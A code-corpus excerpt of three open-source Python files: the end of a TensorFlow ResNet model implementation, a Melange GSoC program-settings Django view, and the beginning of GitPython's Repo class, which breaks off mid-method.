    ) -> Union[Tuple[tf.Tensor], TFBaseModelOutputWithPoolingAndNoAttention]:
        """Forward pass; accepts NCHW `pixel_values` and returns NCHW outputs."""
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        # TF 2.0 image layers can't use NCHW format when running on CPU.
        # We transpose to NHWC format and then transpose back after the full forward pass.
        # (batch_size, num_channels, height, width) -> (batch_size, height, width, num_channels)
        pixel_values = tf.transpose(pixel_values, perm=[0, 2, 3, 1])
        embedding_output = self.embedder(pixel_values, training=training)
        encoder_outputs = self.encoder(
            embedding_output, output_hidden_states=output_hidden_states, return_dict=return_dict, training=training
        )
        last_hidden_state = encoder_outputs[0]
        pooled_output = self.pooler(last_hidden_state)
        # Transpose all the outputs to the NCHW format
        # (batch_size, height, width, num_channels) -> (batch_size, num_channels, height, width)
        last_hidden_state = tf.transpose(last_hidden_state, (0, 3, 1, 2))
        pooled_output = tf.transpose(pooled_output, (0, 3, 1, 2))
        hidden_states = ()
        # encoder_outputs[1:] contains (at most) the tuple of per-stage hidden states;
        # each element is itself a tuple of tensors, all transposed back to NCHW here.
        for hidden_state in encoder_outputs[1:]:
            hidden_states = hidden_states + tuple(tf.transpose(h, (0, 3, 1, 2)) for h in hidden_state)
        if not return_dict:
            return (last_hidden_state, pooled_output) + hidden_states
        hidden_states = hidden_states if output_hidden_states else None
        return TFBaseModelOutputWithPoolingAndNoAttention(
            last_hidden_state=last_hidden_state,
            pooler_output=pooled_output,
            hidden_states=hidden_states,
        )
@add_start_docstrings(
    "The bare ResNet model outputting raw features without any specific head on top.",
    RESNET_START_DOCSTRING,
)
class TFResNetModel(TFResNetPreTrainedModel):
    def __init__(self, config: ResNetConfig, **kwargs) -> None:
        super().__init__(config, **kwargs)
        # All real work is delegated to the shared main layer.
        self.resnet = TFResNetMainLayer(config=config, name="resnet")
    @add_start_docstrings_to_model_forward(RESNET_INPUTS_DOCSTRING)
    @add_code_sample_docstrings(
        processor_class=_FEAT_EXTRACTOR_FOR_DOC,
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=TFBaseModelOutputWithPoolingAndNoAttention,
        config_class=_CONFIG_FOR_DOC,
        modality="vision",
        expected_output=_EXPECTED_OUTPUT_SHAPE,
    )
    @unpack_inputs
    def call(
        self,
        pixel_values: tf.Tensor,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        training: bool = False,
    ) -> Union[Tuple[tf.Tensor], TFBaseModelOutputWithPoolingAndNoAttention]:
        """Thin wrapper: resolve config defaults, then delegate to the main layer."""
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        resnet_outputs = self.resnet(
            pixel_values=pixel_values,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            training=training,
        )
        return resnet_outputs
    def serving_output(
        self, output: TFBaseModelOutputWithPoolingAndNoAttention
    ) -> TFBaseModelOutputWithPoolingAndNoAttention:
        # hidden_states not converted to Tensor with tf.convert_to_tensor as they are all of different dimensions
        return TFBaseModelOutputWithPoolingAndNoAttention(
            last_hidden_state=output.last_hidden_state,
            pooler_output=output.pooler_output,
            hidden_states=output.hidden_states,
        )
@add_start_docstrings(
    """
    ResNet Model with an image classification head on top (a linear layer on top of the pooled features), e.g. for
    ImageNet.
    """,
    RESNET_START_DOCSTRING,
)
class TFResNetForImageClassification(TFResNetPreTrainedModel, TFSequenceClassificationLoss):
    def __init__(self, config: ResNetConfig, **kwargs) -> None:
        super().__init__(config, **kwargs)
        self.num_labels = config.num_labels
        self.resnet = TFResNetMainLayer(config, name="resnet")
        # classification head; identity ("linear") when there are no labels configured
        self.classifier_layer = (
            tf.keras.layers.Dense(config.num_labels, name="classifier.1")
            if config.num_labels > 0
            else tf.keras.layers.Activation("linear", name="classifier.1")
        )
    def classifier(self, x: tf.Tensor) -> tf.Tensor:
        """Flatten the pooled features and project them to class logits."""
        x = tf.keras.layers.Flatten()(x)
        logits = self.classifier_layer(x)
        return logits
    @add_start_docstrings_to_model_forward(RESNET_INPUTS_DOCSTRING)
    @add_code_sample_docstrings(
        processor_class=_FEAT_EXTRACTOR_FOR_DOC,
        checkpoint=_IMAGE_CLASS_CHECKPOINT,
        output_type=TFImageClassifierOutputWithNoAttention,
        config_class=_CONFIG_FOR_DOC,
        expected_output=_IMAGE_CLASS_EXPECTED_OUTPUT,
    )
    @unpack_inputs
    def call(
        self,
        pixel_values: tf.Tensor = None,
        labels: tf.Tensor = None,
        output_hidden_states: bool = None,
        return_dict: bool = None,
        training: bool = False,
    ) -> Union[Tuple[tf.Tensor], TFImageClassifierOutputWithNoAttention]:
        r"""
        labels (`tf.Tensor` of shape `(batch_size,)`, *optional*):
            Labels for computing the image classification/regression loss. Indices should be in `[0, ...,
            config.num_labels - 1]`. If `config.num_labels > 1` a classification loss is computed (Cross-Entropy).
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        outputs = self.resnet(
            pixel_values, output_hidden_states=output_hidden_states, return_dict=return_dict, training=training
        )
        # Tuple layout is (last_hidden_state, pooled_output, *hidden_states).
        pooled_output = outputs.pooler_output if return_dict else outputs[1]
        logits = self.classifier(pooled_output)
        loss = None if labels is None else self.hf_compute_loss(labels, logits)
        if not return_dict:
            output = (logits,) + outputs[2:]
            return (loss,) + output if loss is not None else output
        return TFImageClassifierOutputWithNoAttention(loss=loss, logits=logits, hidden_states=outputs.hidden_states)
    def serving_output(self, output: TFImageClassifierOutputWithNoAttention) -> TFImageClassifierOutputWithNoAttention:
        # hidden_states not converted to Tensor with tf.convert_to_tensor as they are all of different dimensions
        return TFImageClassifierOutputWithNoAttention(logits=output.logits, hidden_states=output.hidden_states)
| {
"content_hash": "6b53df25f36c403e7ccc7734cfaaf8d5",
"timestamp": "",
"source": "github",
"line_count": 487,
"max_line_length": 119,
"avg_line_length": 40.98973305954826,
"alnum_prop": 0.6520388738603347,
"repo_name": "huggingface/transformers",
"id": "4cf0d21ec777dbd0355f52ac808112b03ed15f5e",
"size": "20617",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "src/transformers/models/resnet/modeling_tf_resnet.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "6021"
},
{
"name": "C++",
"bytes": "12959"
},
{
"name": "Cuda",
"bytes": "175419"
},
{
"name": "Dockerfile",
"bytes": "18218"
},
{
"name": "Jsonnet",
"bytes": "937"
},
{
"name": "Makefile",
"bytes": "3430"
},
{
"name": "Python",
"bytes": "35742012"
},
{
"name": "Shell",
"bytes": "30374"
}
],
"symlink_target": ""
} |
"""Module for the program settings pages.
"""
__authors__ = [
'"Sverre Rabbelier" <sverre@rabbelier.nl>',
]
from django.conf.urls.defaults import url
from django.core.urlresolvers import reverse
from soc.logic.models.document import logic as document_logic
from soc.views.forms import ModelForm
from soc.modules.gsoc.models.program import GSoCProgram
from soc.modules.gsoc.views.base import RequestHandler
from soc.modules.gsoc.views.helper import url_patterns
class ProgramForm(ModelForm):
  """Django form for the program settings.
  """
  def __init__(self, scope_path, *args, **kwargs):
    # scope_path identifies the program entity this form edits; stored for later use.
    self.scope_path = scope_path
    super(ProgramForm, self).__init__(*args, **kwargs)
  class Meta:
    css_prefix = 'program_form'
    model = GSoCProgram
    # Structural/identity fields are managed elsewhere and must not be user-editable.
    exclude = ['link_id', 'scope', 'scope_path', 'timeline',
               'home', 'slots_allocation']
class ProgramPage(RequestHandler):
  """View for editing the GSoC program settings (hosts only).
  """

  def djangoURLPatterns(self):
    """Return the URL patterns served by this handler."""
    return [
        url(r'^gsoc/program/edit/%s$' % url_patterns.PROGRAM, self,
            name='edit_gsoc_program'),
    ]

  def jsonContext(self):
    """Return the program's documents as JSON-serializable picker data."""
    entities = document_logic.getForFields({
        'prefix': 'gsoc_program',
        'scope': self.data.program.key()
    })
    data = [{'key': str(i.key()),
             'key_name': i.key().name(),
             'label': i.title}
            for i in entities]
    return {'data': data}

  def checkAccess(self):
    # Only program hosts may edit program settings.
    self.check.isHost()

  def templatePath(self):
    return 'v2/modules/gsoc/program/base.html'

  def context(self):
    """Build the template context with a (possibly bound) settings form."""
    scope_path = self.data.program.key().id_or_name()
    program_form = ProgramForm(scope_path, self.data.POST or None,
                               instance=self.data.program)
    return {
        'page_name': 'Edit program settings',
        'forms': [program_form],
        'error': program_form.errors,
    }

  def validate(self):
    """Validate and save the posted form.

    Returns True on success, False if the form did not validate.
    """
    scope_path = self.data.program.key().id_or_name()
    program_form = ProgramForm(scope_path, self.data.POST,
                               instance=self.data.program)
    if not program_form.is_valid():
      return False
    program_form.save()
    # BUG FIX: previously fell off the end (returning None), so post() treated
    # every successful save as a failure and never redirected.
    return True

  def post(self):
    """Handler for HTTP POST request.
    """
    if self.validate():
      self.redirect.program()
      self.redirect.to('edit_program_settings')
    else:
      # Validation failed: re-render the page with the bound form's errors.
      self.get()
| {
"content_hash": "a3cce4e15b2c13f411d84720ca994dc8",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 67,
"avg_line_length": 25.86813186813187,
"alnum_prop": 0.6265930331350892,
"repo_name": "SRabbelier/Melange",
"id": "9badef269509b44198c669ad3ce4bb9fd26c98a6",
"size": "2964",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/soc/modules/gsoc/views/program.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "400472"
},
{
"name": "C++",
"bytes": "20"
},
{
"name": "Java",
"bytes": "1496"
},
{
"name": "JavaScript",
"bytes": "1623582"
},
{
"name": "PHP",
"bytes": "1032"
},
{
"name": "Perl",
"bytes": "177565"
},
{
"name": "Python",
"bytes": "15317793"
},
{
"name": "Ruby",
"bytes": "59"
},
{
"name": "Shell",
"bytes": "15303"
}
],
"symlink_target": ""
} |
from git.exc import InvalidGitRepositoryError, NoSuchPathError
from git.cmd import Git
from git.util import Actor
from git.refs import *
from git.index import IndexFile
from git.objects import *
from git.config import GitConfigParser
from git.remote import (
Remote,
digest_process_messages,
finalize_process,
add_progress
)
from git.db import (
GitCmdObjectDB,
GitDB
)
from gitdb.util import (
join,
isfile,
hex_to_bin
)
from fun import (
rev_parse,
is_git_dir,
touch
)
import os
import sys
import re
# Pick the default object database implementation.
# NOTE(review): this only inspects the *minor* version (index 1), assuming a
# Python 2 interpreter — it would misbehave on Python 3.x; confirm intent.
DefaultDBType = GitDB
if sys.version_info[1] < 5:  # python 2.4 compatibility
    DefaultDBType = GitCmdObjectDB
# END handle python 2.4
__all__ = ('Repo', )
class Repo(object):
"""Represents a git repository and allows you to query references,
gather commit information, generate diffs, create and clone repositories query
the log.
The following attributes are worth using:
'working_dir' is the working directory of the git command, wich is the working tree
directory if available or the .git directory in case of bare repositories
'working_tree_dir' is the working tree directory, but will raise AssertionError
if we are a bare repository.
'git_dir' is the .git repository directoy, which is always set."""
DAEMON_EXPORT_FILE = 'git-daemon-export-ok'
__slots__ = ( "working_dir", "_working_tree_dir", "git_dir", "_bare", "git", "odb" )
# precompiled regex
re_whitespace = re.compile(r'\s+')
re_hexsha_only = re.compile('^[0-9A-Fa-f]{40}$')
re_hexsha_shortened = re.compile('^[0-9A-Fa-f]{4,40}$')
re_author_committer_start = re.compile(r'^(author|committer)')
re_tab_full_line = re.compile(r'^\t(.*)$')
# invariants
# represents the configuration level of a configuration file
config_level = ("system", "global", "repository")
    def __init__(self, path=None, odbt = DefaultDBType):
        """Create a new Repo instance
        :param path: is the path to either the root git directory or the bare git repo::
            repo = Repo("/Users/mtrier/Development/git-python")
            repo = Repo("/Users/mtrier/Development/git-python.git")
            repo = Repo("~/Development/git-python.git")
            repo = Repo("$REPOSITORIES/Development/git-python.git")
        :param odbt: Object DataBase type - a type which is constructed by providing
            the directory containing the database objects, i.e. .git/objects. It will
            be used to access all object data
        :raise InvalidGitRepositoryError:
        :raise NoSuchPathError:
        :return: git.Repo """
        # Expand ~user, $VARS and make absolute; default to the current directory.
        epath = os.path.abspath(os.path.expandvars(os.path.expanduser(path or os.getcwd())))
        if not os.path.exists(epath):
            raise NoSuchPathError(epath)
        self.working_dir = None
        self._working_tree_dir = None
        self.git_dir = None
        curpath = epath
        # walk up the path to find the .git dir
        while curpath:
            # Case 1: epath itself is a git dir (bare repo or the .git dir directly).
            if is_git_dir(curpath):
                self.git_dir = curpath
                self._working_tree_dir = os.path.dirname(curpath)
                break
            # Case 2: epath is (inside) a working tree containing a .git dir.
            gitpath = join(curpath, '.git')
            if is_git_dir(gitpath):
                self.git_dir = gitpath
                self._working_tree_dir = curpath
                break
            curpath, dummy = os.path.split(curpath)
            if not dummy:
                break
        # END while curpath
        if self.git_dir is None:
            raise InvalidGitRepositoryError(epath)
        self._bare = False
        try:
            self._bare = self.config_reader("repository").getboolean('core','bare')
        except Exception:
            # lets not assume the option exists, although it should
            pass
        # adjust the wd in case we are actually bare - we didn't know that
        # in the first place
        if self._bare:
            self._working_tree_dir = None
        # END working dir handling
        self.working_dir = self._working_tree_dir or self.git_dir
        self.git = Git(self.working_dir)
        # special handling, in special times
        args = [join(self.git_dir, 'objects')]
        if issubclass(odbt, GitCmdObjectDB):
            args.append(self.git)
        self.odb = odbt(*args)
def __eq__(self, rhs):
if isinstance(rhs, Repo):
return self.git_dir == rhs.git_dir
return False
def __ne__(self, rhs):
return not self.__eq__(rhs)
def __hash__(self):
return hash(self.git_dir)
def __repr__(self):
return "%s(%r)" % (type(self).__name__, self.git_dir)
    # Description property
    # NOTE(review): these use the Python 2 ``file()`` builtin and do not close
    # the handle explicitly — relies on CPython refcounting.
    def _get_description(self):
        # Reads .git/description, stripping the trailing newline.
        filename = join(self.git_dir, 'description')
        return file(filename).read().rstrip()
    def _set_description(self, descr):
        # Overwrites .git/description, re-adding a trailing newline.
        filename = join(self.git_dir, 'description')
        file(filename, 'w').write(descr+'\n')
    description = property(_get_description, _set_description,
                        doc="the project's description")
    del _get_description
    del _set_description
    @property
    def working_tree_dir(self):
        """:return: The working tree directory of our git repository
        :raise AssertionError: If we are a bare repository"""
        if self._working_tree_dir is None:
            raise AssertionError( "Repository at %r is bare and does not have a working tree directory" % self.git_dir )
        return self._working_tree_dir
    @property
    def bare(self):
        """:return: True if the repository is bare"""
        return self._bare
    @property
    def heads(self):
        """A list of ``Head`` objects representing the branch heads in
        this repo
        :return: ``git.IterableList(Head, ...)``"""
        return Head.list_items(self)
    @property
    def references(self):
        """A list of Reference objects representing tags, heads and remote references.
        :return: IterableList(Reference, ...)"""
        return Reference.list_items(self)
    # alias for references
    refs = references
    # alias for heads
    branches = heads
    @property
    def index(self):
        """:return: IndexFile representing this repository's index.
        Note: a new IndexFile instance is created on every access."""
        return IndexFile(self)
    @property
    def head(self):
        """:return: HEAD Object pointing to the current head reference"""
        return HEAD(self,'HEAD')
    @property
    def remotes(self):
        """A list of Remote objects allowing to access and manipulate remotes
        :return: ``git.IterableList(Remote, ...)``"""
        return Remote.list_items(self)
    def remote(self, name='origin'):
        """:return: Remote with the specified name
        :raise ValueError: if no remote with such a name exists"""
        return Remote(self, name)
    #{ Submodules
    @property
    def submodules(self):
        """
        :return: git.IterableList(Submodule, ...) of direct submodules
            available from the current head"""
        return Submodule.list_items(self)
    def submodule(self, name):
        """ :return: Submodule with the given name
        :raise ValueError: If no such submodule exists"""
        try:
            return self.submodules[name]
        except IndexError:
            # IterableList raises IndexError for unknown names; translate it
            # into the documented ValueError.
            raise ValueError("Didn't find submodule named %r" % name)
        # END exception handling
    def create_submodule(self, *args, **kwargs):
        """Create a new submodule
        :note: See the documentation of Submodule.add for a description of the
            applicable parameters
        :return: created submodules"""
        return Submodule.add(self, *args, **kwargs)
    def iter_submodules(self, *args, **kwargs):
        """An iterator yielding Submodule instances, see Traversable interface
        for a description of args and kwargs
        :return: Iterator"""
        return RootModule(self).traverse(*args, **kwargs)
    def submodule_update(self, *args, **kwargs):
        """Update the submodules, keeping the repository consistent as it will
        take the previous state into consideration. For more information, please
        see the documentation of RootModule.update"""
        return RootModule(self).update(*args, **kwargs)
    #}END submodules
@property
def tags(self):
"""A list of ``Tag`` objects that are available in this repo
:return: ``git.IterableList(TagReference, ...)`` """
return TagReference.list_items(self)
def tag(self,path):
""":return: TagReference Object, reference pointing to a Commit or Tag
:param path: path to the tag reference, i.e. 0.1.5 or tags/0.1.5 """
return TagReference(self, path)
def create_head(self, path, commit='HEAD', force=False, logmsg=None ):
"""Create a new head within the repository.
For more documentation, please see the Head.create method.
:return: newly created Head Reference"""
return Head.create(self, path, commit, force, logmsg)
def delete_head(self, *heads, **kwargs):
"""Delete the given heads
:param kwargs: Additional keyword arguments to be passed to git-branch"""
return Head.delete(self, *heads, **kwargs)
def create_tag(self, path, ref='HEAD', message=None, force=False, **kwargs):
"""Create a new tag reference.
For more documentation, please see the TagReference.create method.
:return: TagReference object """
return TagReference.create(self, path, ref, message, force, **kwargs)
def delete_tag(self, *tags):
"""Delete the given tag references"""
return TagReference.delete(self, *tags)
def create_remote(self, name, url, **kwargs):
"""Create a new remote.
For more information, please see the documentation of the Remote.create
methods
:return: Remote reference"""
return Remote.create(self, name, url, **kwargs)
def delete_remote(self, remote):
"""Delete the given remote."""
return Remote.remove(self, remote)
def _get_config_path(self, config_level):
    """Map a configuration level name onto its configuration file path.

    :param config_level: one of "system", "global" or "repository"
    :return: path of the configuration file for the given level
    :raise ValueError: if config_level is not a known level"""
    # Windows has no well-known system-wide gitconfig path, so the system
    # level silently falls back to the user-level (global) file.
    if config_level == "system" and sys.platform == "win32":
        config_level = "global"
    if config_level == "system":
        return "/etc/gitconfig"
    if config_level == "global":
        return os.path.normpath(os.path.expanduser("~/.gitconfig"))
    if config_level == "repository":
        return join(self.git_dir, "config")
    raise ValueError("Invalid configuration level: %r" % config_level)
def config_reader(self, config_level=None):
    """Return a read-only GitConfigParser over the git configuration.

    :param config_level:
        For possible values, see the config_writer method.
        If None, all applicable levels will be merged. Specify a level in
        case you know exactly which file you wish to read, to prevent
        reading multiple files.
    :note: On windows, the system configuration cannot currently be read as
        the path is unknown; the global path is used instead."""
    if config_level is None:
        # Merge every applicable level (see self.config_level for the order).
        files = [self._get_config_path(level) for level in self.config_level]
    else:
        files = [self._get_config_path(config_level)]
    return GitConfigParser(files, read_only=True)
def config_writer(self, config_level="repository"):
"""
:return:
GitConfigParser allowing to write values of the specified configuration file level.
Config writers should be retrieved, used to change the configuration, and written
right away as they will lock the configuration file in question and prevent others
from writing it.
:param config_level:
One of the following values
system = system wide configuration file
global = user level configuration file
repository = configuration file for this repository only"""
return GitConfigParser(self._get_config_path(config_level), read_only = False)
def commit(self, rev=None):
    """The Commit object for the specified revision.

    :param rev: revision specifier, see git-rev-parse for viable options.
    :return: ``git.Commit``"""
    if rev is None:
        return self.head.commit
    # "<rev>^0" peels the revision down to the underlying commit object.
    return self.rev_parse("%s^0" % rev)
def iter_trees(self, *args, **kwargs):
""":return: Iterator yielding Tree objects
:note: Takes all arguments known to iter_commits method"""
# Lazy generator: one tree per commit yielded by iter_commits.
return ( c.tree for c in self.iter_commits(*args, **kwargs) )
def tree(self, rev=None):
    """The Tree object for the given treeish revision.

    Examples::

        repo.tree(repo.heads[0])

    :param rev: is a revision pointing to a Treeish ( being a commit or tree )
    :return: ``git.Tree``
    :note:
        If you need a non-root level tree, find it by iterating the root
        tree. Otherwise it cannot know about its path relative to the
        repository root and subsequent operations might have unexpected
        results."""
    if rev is None:
        return self.head.commit.tree
    # "<rev>^{tree}" peels the revision down to its tree object.
    return self.rev_parse("%s^{tree}" % rev)
def iter_commits(self, rev=None, paths='', **kwargs):
"""A list of Commit objects representing the history of a given ref/commit
:param rev:
revision specifier, see git-rev-parse for viable options.
If None, the active branch will be used.
:param paths:
is an optional path or a list of paths to limit the returned commits to
Commits that do not contain that path or the paths will not be returned.
:param kwargs:
Arguments to be passed to git-rev-list - common ones are
max_count and skip
:note: to receive only commits between two named revisions, use the
"revA..revB" revision specifier
:return ``git.Commit[]``"""
if rev is None:
rev = self.head.commit
return Commit.iter_items(self, rev, paths, **kwargs)
def _get_daemon_export(self):
    """Whether the git-daemon export marker file exists for this repo."""
    # The flag is simply the presence of the marker file in git_dir.
    return os.path.exists(join(self.git_dir, self.DAEMON_EXPORT_FILE))
def _set_daemon_export(self, value):
    """Create or remove the daemon-export marker file to match *value*."""
    filename = join(self.git_dir, self.DAEMON_EXPORT_FILE)
    marker_present = os.path.exists(filename)
    if value and not marker_present:
        touch(filename)
    elif marker_present and not value:
        os.unlink(filename)
daemon_export = property(_get_daemon_export, _set_daemon_export,
doc="If True, git-daemon may export this repository")
# Remove the raw accessors from the class namespace - only the property remains.
del _get_daemon_export
del _set_daemon_export
def _get_alternates(self):
    """The list of alternates for this repo from which objects can be
    retrieved.

    :return: list of strings being pathnames of alternates"""
    alternates_path = join(self.git_dir, 'objects', 'info', 'alternates')
    if not os.path.exists(alternates_path):
        return list()
    # BUGFIX: previously open() was inside the try block while f.close() was
    # in finally; if open() itself failed, the finally clause raised a
    # NameError on the unbound `f` and masked the real error.
    f = open(alternates_path)
    try:
        alts = f.read()
    finally:
        f.close()
    # One alternate object-store path per line.
    return alts.strip().splitlines()
def _set_alternates(self, alts):
    """Sets the alternates.

    :param alts:
        is the array of string paths representing the alternates at which
        git should look for objects, i.e. /home/user/repo/.git/objects
    :raise NoSuchPathError:
    :note:
        The method does not check for the existence of the paths in alts
        as the caller is responsible."""
    alternates_path = join(self.git_dir, 'objects', 'info', 'alternates')
    if not alts:
        # An empty alternates list removes the file entirely.
        if isfile(alternates_path):
            os.remove(alternates_path)
    else:
        # BUGFIX: open() used to live inside the try whose finally called
        # f.close(); a failed open() then raised NameError instead of the
        # original error. Open first, then guard only the write.
        f = open(alternates_path, 'w')
        try:
            f.write("\n".join(alts))
        finally:
            f.close()
        # END file handling
    # END alts handling
alternates = property(_get_alternates, _set_alternates, doc="Retrieve a list of alternates paths or set a list paths to be used as alternates")
def is_dirty(self, index=True, working_tree=True, untracked_files=False):
    """
    :return:
        ``True`` if the repository is considered dirty. By default it will
        react like a git-status without untracked files, hence it is dirty
        if the index or the working copy have changes."""
    if self._bare:
        # Bare repositories have no index or working tree to be dirty.
        return False

    diff_args = ('--abbrev=40', '--full-index', '--raw')
    # Checks ordered cheapest-first; return as soon as anything is dirty.
    if index and isfile(self.index.path) and self.head.is_valid():
        # diff the index against HEAD
        if len(self.git.diff('HEAD', '--cached', *diff_args)):
            return True
    if working_tree:
        # diff the index against the working tree
        if len(self.git.diff(*diff_args)):
            return True
    if untracked_files:
        if len(self.untracked_files):
            return True
    return False
@property
def untracked_files(self):
"""
:return:
list(str,...)
Files currently untracked as they have not been staged yet. Paths
are relative to the current working directory of the git command.
:note:
ignored files will not appear here, i.e. files mentioned in .gitignore"""
# make sure we get all files, not only untracked directories
proc = self.git.status(untracked_files=True, as_process=True)
# NOTE(review): parses human-readable `git status` output; this is fragile
# across git versions - confirm against the git version in use.
stream = iter(proc.stdout)
untracked_files = list()
for line in stream:
if not line.startswith("# Untracked files:"):
continue
# skip the two header lines following the section marker
# NOTE: stream.next() is python-2 only; python 3 would need next(stream)
stream.next()
stream.next()
for untracked_info in stream:
if not untracked_info.startswith("#\t"):
break
untracked_files.append(untracked_info.replace("#\t", "").rstrip())
# END for each untracked info line
# END for each line
return untracked_files
@property
def active_branch(self):
"""The name of the currently active branch.
:return: Head to the active branch"""
# Follows the HEAD symbolic reference; behavior on a detached HEAD is
# determined by self.head.reference.
return self.head.reference
def blame(self, rev, file):
"""The blame information for the given file at the given revision.
:param rev: revision specifier, see git-rev-parse for viable options.
:return:
list: [git.Commit, list: [<line>]]
A list of tuples associating a Commit object with a list of lines that
changed within the given commit. The Commit objects will be given in order
of appearance."""
# Parse `git blame -p` (porcelain) output line by line. The state machine
# below distinguishes hexsha headers, author/committer metadata and the
# actual content lines (which start with a TAB).
data = self.git.blame(rev, '--', file, p=True)
commits = dict()
blames = list()
info = None
for line in data.splitlines(False):
parts = self.re_whitespace.split(line, 1)
firstpart = parts[0]
if self.re_hexsha_only.search(firstpart):
# handles
# 634396b2f541a9f2d58b00be1a07f0c358b999b3 1 1 7 - indicates blame-data start
# 634396b2f541a9f2d58b00be1a07f0c358b999b3 2 2 - indicates another line of blame with the same data
digits = parts[-1].split(" ")
if len(digits) == 3:
info = {'id': firstpart}
blames.append([None, []])
elif info['id'] != firstpart:
info = {'id': firstpart}
blames.append([commits.get(firstpart), []])
# END blame data initialization
else:
m = self.re_author_committer_start.search(firstpart)
if m:
# handles:
# author Tom Preston-Werner
# author-mail <tom@mojombo.com>
# author-time 1192271832
# author-tz -0700
# committer Tom Preston-Werner
# committer-mail <tom@mojombo.com>
# committer-time 1192271832
# committer-tz -0700 - IGNORED BY US
role = m.group(0)
if firstpart.endswith('-mail'):
info["%s_email" % role] = parts[-1]
elif firstpart.endswith('-time'):
info["%s_date" % role] = int(parts[-1])
elif role == firstpart:
info[role] = parts[-1]
# END distinguish mail,time,name
else:
# handle
# filename lib/grit.rb
# summary add Blob
# <and rest>
if firstpart.startswith('filename'):
info['filename'] = parts[-1]
elif firstpart.startswith('summary'):
info['summary'] = parts[-1]
elif firstpart == '':
if info:
# A content line follows - materialize the Commit object once per
# sha and cache it so repeated hunks reuse the same instance.
sha = info['id']
c = commits.get(sha)
if c is None:
c = Commit( self, hex_to_bin(sha),
author=Actor._from_string(info['author'] + ' ' + info['author_email']),
authored_date=info['author_date'],
committer=Actor._from_string(info['committer'] + ' ' + info['committer_email']),
committed_date=info['committer_date'],
message=info['summary'])
commits[sha] = c
# END if commit objects needs initial creation
m = self.re_tab_full_line.search(line)
text, = m.groups()
blames[-1][0] = c
info = {'id': sha}
# END if we collected commit info
blames[-1][1].append( text )
# END distinguish filename,summary,rest
# END distinguish author|committer vs filename,summary,rest
# END distinguish hexsha vs other information
return blames
@classmethod
def init(cls, path=None, mkdir=True, **kwargs):
    """Initialize a git repository at the given path if specified.

    :param path:
        is the full path to the repo (traditionally ends with /<name>.git)
        or None in which case the repository will be created in the current
        working directory
    :param mkdir:
        if specified will create the repository directory if it doesn't
        already exist. Creates the directory with a mode=0755.
        Only effective if a path is explicitly given
    :param kwargs:
        keyword arguments serving as additional options to the git-init
        command
    :return: ``git.Repo`` (the newly created repo)"""
    if mkdir and path and not os.path.exists(path):
        # 0o755 is valid octal syntax on python 2.6+ and python 3 alike.
        os.makedirs(path, 0o755)

    # The git command automatically chdirs into the directory.
    git = Git(path)
    # The command output is not needed; failures surface from the wrapper.
    git.init(**kwargs)
    return Repo(path)
@classmethod
def _clone(cls, git, url, path, odb_default_type, progress, **kwargs):
# special handling for windows for path at which the clone should be
# created.
# tilde '~' will be expanded to the HOME no matter where the ~ occurs. Hence
# we at least give a proper error instead of letting git fail
prev_cwd = None
prev_path = None
odbt = kwargs.pop('odbt', odb_default_type)
if os.name == 'nt':
if '~' in path:
raise OSError("Git cannot handle the ~ character in path %r correctly" % path)
# on windows, git will think paths like c: are relative and prepend the
# current working dir ( before it fails ). We temporarily adjust the working
# dir to make this actually work
match = re.match("(\w:[/\\\])(.*)", path)
if match:
prev_cwd = os.getcwd()
prev_path = path
drive, rest_of_path = match.groups()
os.chdir(drive)
path = rest_of_path
kwargs['with_keep_cwd'] = True
# END cwd preparation
# END windows handling
try:
proc = git.clone(url, path, with_extended_output=True, as_process=True, v=True, **add_progress(kwargs, git, progress))
if progress:
digest_process_messages(proc.stderr, progress)
#END handle progress
finalize_process(proc)
finally:
# Restore the working directory changed by the windows drive workaround.
if prev_cwd is not None:
os.chdir(prev_cwd)
path = prev_path
# END reset previous working dir
# END bad windows handling
# our git command could have a different working dir than our actual
# environment, hence we prepend its working dir if required
if not os.path.isabs(path) and git.working_dir:
path = join(git._working_dir, path)
# adjust remotes - there may be operating systems which use backslashes,
# These might be given as initial paths, but when handling the config file
# that contains the remote from which we were cloned, git stops liking it
# as it will escape the backslashes. Hence we undo the escaping just to be
# sure
repo = cls(os.path.abspath(path), odbt = odbt)
if repo.remotes:
repo.remotes[0].config_writer.set_value('url', repo.remotes[0].url.replace("\\\\", "\\").replace("\\", "/"))
# END handle remote repo
return repo
def clone(self, path, progress=None, **kwargs):
"""Create a clone from this repository.
:param path:
is the full path of the new repo (traditionally ends with ./<name>.git).
:param progress: See 'git.remote.Remote.push'.
:param kwargs:
odbt = ObjectDatabase Type, allowing to determine the object database
implementation used by the returned Repo instance
All remaining keyword arguments are given to the git-clone command
:return: ``git.Repo`` (the newly cloned repo)"""
# Clones from our own git_dir, reusing our git command instance.
return self._clone(self.git, self.git_dir, path, type(self.odb), progress, **kwargs)
@classmethod
def clone_from(cls, url, to_path, progress=None, **kwargs):
"""Create a clone from the given URL
:param url: valid git url, see http://www.kernel.org/pub/software/scm/git/docs/git-clone.html#URLS
:param to_path: Path to which the repository should be cloned to
:param progress: See 'git.remote.Remote.push'.
:param kwargs: see the ``clone`` method
:return: Repo instance pointing to the cloned directory"""
# A fresh Git instance bound to the current working directory drives the clone.
return cls._clone(Git(os.getcwd()), url, to_path, GitCmdObjectDB, progress, **kwargs)
def archive(self, ostream, treeish=None, prefix=None, **kwargs):
    """Archive the tree at the given revision.

    :param ostream: file compatible stream object to which the archive will be written
    :param treeish: is the treeish name/id, defaults to active branch
    :param prefix: is the optional prefix to prepend to each filename in the archive
    :param kwargs:
        Additional arguments passed to git-archive
        NOTE: Use the 'format' argument to define the kind of format. Use
        specialized ostreams to write any format supported by python
    :raise GitCommandError: in case something went wrong
    :return: self"""
    treeish = self.head.commit if treeish is None else treeish
    # An explicit prefix argument wins only if kwargs did not already set one.
